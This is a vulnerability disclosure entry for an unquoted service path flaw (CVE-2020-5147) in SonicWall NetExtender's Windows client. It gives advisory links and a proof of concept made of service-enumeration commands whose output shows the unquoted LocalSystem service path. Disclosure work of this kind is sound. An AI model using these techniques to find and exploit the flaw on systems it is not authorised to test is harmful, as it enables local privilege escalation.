# Exploit Title: SonicWall NetExtender 10.2.0.300 - Unquoted Service Path
# Exploit Author: shinnai
# Software Link: https://www.sonicwall.com/products/remote-access/vpn-clients/
# Version: 10.2.0.300
# Tested On: Windows
# CVE: CVE-2020-5147
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Title: SonicWall NetExtender windows client unquoted service path
vulnerability
Vers.: 10.2.0.300
Down.: https://www.sonicwall.com/products/remote-access/vpn-clients/
Advisory:
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0023
CVE ID: CVE-2020-5147 (https://nvd.nist.gov/vuln/detail/CVE-2020-5147)
URLs:
https://besteffortteam.it/sonicwall-netextender-windows-client-unquoted-service-path-vulnerability/
https://shinnai.altervista.org/exploits/SH-029-20210109.html
Desc.:
SonicWall NetExtender Windows client vulnerable to unquoted service path
vulnerability, this allows a local attacker to gain elevated privileges
in the host operating system.
This vulnerability impact SonicWall NetExtender Windows client version
10.2.300 and earlier.
Poc:
C:\>sc qc sonicwall_client_protection_svc
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: sonicwall_client_protection_svc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files\SonicWall\Client
Protection Service\SonicWallClientProtectionService.exe <-- Unquoted
Service Path Vulnerability
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : SonicWall Client Protection Service
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
C:\>
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
C:\>wmic service get name,displayname,pathname,startmode |findstr /i
"auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
SonicWall Client Protection Service
sonicwall_client_protection_svc C:\Program Files\SonicWall\Client
Protection Service\SonicWallClientProtectionService.exe Auto
C:\>
----------------------------------------------------------------------------------------------------------------------------------------------------------------------